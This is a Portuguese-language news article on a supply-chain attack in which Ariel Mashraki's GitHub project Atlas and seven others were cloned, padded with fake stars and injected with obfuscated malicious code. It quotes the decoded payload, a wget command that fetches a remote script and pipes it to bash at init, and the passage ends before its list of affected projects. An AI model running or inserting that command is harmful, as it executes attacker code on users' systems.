[ 273,274 page views, 120,004 usuários nos últimos 30 dias ] - [ 6.086 assinantes na newsletter, taxa de abertura 27% ]

Pesquisar

Ataque com malware envenena 8 projetos no GitHub

O engenheiro de software israelense Ariel Mashraki publicou ontem um alerta no Reddit informando que alguém copiou seu projeto do GitHub, fez com que ele parecesse mais confiável adicionando estrelas de muitos usuários falsos e, então, “injetou código malicioso de runtime para usuários em potencial”. O projeto de Mashraki (@a8m no GitHub) é o Atlas, uma ferramenta para gerenciar e migrar esquemas de banco de dados usando princípios modernos de DevOps. Segundo ele, o mesmo ataque foi feito em sete outros projetos também. O projeto tem cerca de 4 mil usuários e é muito adotado em soluções com GoLang.

Leia também
Popularidade do MacOS atrai cibercriminosos
Pesquisa CISO Advisor: cenário de cyber 2025

Segundo Mashraki, o problema parece ser grande e “é difícil detectar o impacto total. O invasor ofusca o código, alterando identificadores e embaralhando a ordem da matriz de bytes, então você não pode procurá-lo facilmente no GitHub. Isso torna quase impossível rastrear o impacto total, a menos que o GitHub intervenha e ajude a resolver esse problema (relatei esses repositórios ao suporte do GitHub)”.

O engenheiro indicou “as partes do código malicioso: https://github.com/readyrevena/atlas-provider-gorm/blob/master/gormschema/gorm.go#L403-L412 . Isso basicamente executa o seguinte código no init”:

wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &

Os outros projetos contaminados que ele localizou foram os seguintes: